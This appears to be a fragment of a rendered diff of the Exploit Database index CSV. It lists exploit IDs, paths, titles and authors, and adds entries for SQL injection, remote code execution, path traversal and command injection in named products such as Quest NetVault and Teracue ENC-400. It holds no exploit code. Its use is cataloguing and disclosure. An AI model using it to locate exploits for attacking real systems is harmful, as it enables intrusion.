44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -40900,3 +40902,6 @@ id,file,description,date,author,type,platform,port
|
|||
46426,exploits/php/webapps/46426.txt,"Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection",2019-02-19,"Mr Winst0n",webapps,php,80
|
||||
46427,exploits/java/webapps/46427.txt,"Jenkins - Remote Code Execution",2019-02-19,orange,webapps,java,
|
||||
46429,exploits/php/webapps/46429.txt,"HotelDruid 2.3 - Cross-Site Scripting",2019-02-20,"Mehmet EMIROGLU",webapps,php,80
|
||||
46446,exploits/multiple/webapps/46446.txt,"Quest NetVault Backup Server < 11.4.5 - Process Manager Service SQL Injection / Remote Code Execution",2019-02-22,"Chris Anastasio",webapps,multiple,
|
||||
46450,exploits/linux/webapps/46450.txt,"Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation",2019-02-22,SecureAuth,webapps,linux,
|
||||
46451,exploits/hardware/webapps/46451.txt,"Teracue ENC-400 - Command Injection / Missing Authentication",2019-02-22,"Stephen Shkardoon",webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue